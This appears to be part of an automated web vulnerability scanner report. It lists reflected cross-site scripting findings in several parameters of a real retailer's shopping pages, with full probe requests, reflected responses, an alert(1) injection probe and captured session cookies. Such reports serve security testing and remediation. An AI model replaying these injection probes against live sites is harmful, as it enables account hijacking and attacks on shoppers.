Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253DSimilar%252520priced%252520items%2526oidt%253D3%2526ot%253DSUBMIT%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

PROD_LIST=QP767AA%23ABA%7CBV704AA%23ABA6e7d1"%3ba4830b19c2d&landing=desktops&category=p7xt_series&lanAttr=&subcat1=rts&storeName=computer_store&compare=Similar+priced+items

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:29:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:29:37 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 250284


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!--
...[SNIP]...
lumnIndexArray = new Array();
var productArray = new Array();
var browserName=(navigator.appName != "Microsoft Internet Explorer")?"table-cell":"block";

var tempPCPProducts = "QP767AA#ABA|BV704AA#ABA6e7d1";a4830b19c2d"
var orgPCPProducts = tempPCPProducts.split("|");
function showProductOverlayDemo(arrayOfIDsShow,demoID,demoURL,hrefPos,overlaydemo,nonStaticDiv)
{
   if (typeof( arrayOfIDsShow.length) == 'undef
...[SNIP]...

1.30. http://www.shopping.hp.com/webapp/shopping/product_comparison.do [lanAttr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_comparison.do

Issue detail

The value of the lanAttr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58f0d"%20a%3db%20ab9279e704a was submitted in the lanAttr parameter. This input was echoed as 58f0d" a=b ab9279e704a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /webapp/shopping/product_comparison.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 152
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253DSimilar%252520priced%252520items%2526oidt%253D3%2526ot%253DSUBMIT%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

PROD_LIST=QP767AA%23ABA%7CBV704AA%23ABA&landing=desktops&category=p7xt_series&lanAttr=58f0d"%20a%3db%20ab9279e704a&subcat1=rts&storeName=computer_store&compare=Similar+priced+items

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:30:02 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:30:01 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 284712


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!--
...[SNIP]...
e" value="/product_detail.do?storeName=storefronts&landing=rts_desktop&category=rts_desktop&&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/product_comparison.do&lanAttr=58f0d" a=b ab9279e704a">
...[SNIP]...

1.31. http://www.shopping.hp.com/webapp/shopping/product_comparison.do [landing parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_comparison.do

Issue detail

The value of the landing request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3433"%3b47173d103a2 was submitted in the landing parameter. This input was echoed as a3433";47173d103a2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /webapp/shopping/product_comparison.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 152
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253DSimilar%252520priced%252520items%2526oidt%253D3%2526ot%253DSUBMIT%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

PROD_LIST=QP767AA%23ABA%7CBV704AA%23ABA&landing=desktopsa3433"%3b47173d103a2&category=p7xt_series&lanAttr=&subcat1=rts&storeName=computer_store&compare=Similar+priced+items

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:29:39 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:29:38 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 284152


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!--
...[SNIP]...
op=100");
}

function windowOpenEmail()
{
var url = "https://www.shopping.hp.com/webapp/shopping/emailAFriendRequest.do?productList="+ escape(orgPCPProducts.join("|")) + "&source=pcp&landing=desktopsa3433";47173d103a2";
window.open(url , "newWindow", "scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0,width=800,height=650,left=200,top=100");
}

function windowChat()
{
var url = "http://ww
...[SNIP]...

1.32. http://www.shopping.hp.com/webapp/shopping/product_comparison.do [subcat1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_comparison.do

Issue detail

The value of the subcat1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a71d"%20a%3db%208a778188a16 was submitted in the subcat1 parameter. This input was echoed as 5a71d" a=b 8a778188a16 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /webapp/shopping/product_comparison.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 152
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253DSimilar%252520priced%252520items%2526oidt%253D3%2526ot%253DSUBMIT%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

PROD_LIST=QP767AA%23ABA%7CBV704AA%23ABA&landing=desktops&category=p7xt_series&lanAttr=&subcat1=rts5a71d"%20a%3db%208a778188a16&storeName=computer_store&compare=Similar+priced+items

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:30:10 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:30:10 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 284373


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=storefronts&landing=rts_desktop&category=rts_desktop&&subcat1=rts5a71d" a=b 8a778188a16&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/product_comparison.do">
...[SNIP]...

1.33. http://www.shopping.hp.com/webapp/shopping/product_detail.do [&subcat1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the &subcat1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1272f'%3bd8b7fc6fcc3 was submitted in the &subcat1 parameter. This input was echoed as 1272f';d8b7fc6fcc3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=storefronts&landing=rts_desktop&category=rts_desktop&&subcat1=rts1272f'%3bd8b7fc6fcc3&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/product_comparison.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_comparison.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkoiNyT2w59Nijvv1PXcQyYmmvi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777571; hpcompc_usen=cartExists=true; EMID=; s_depth=29; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Acompare; s_cc=true; 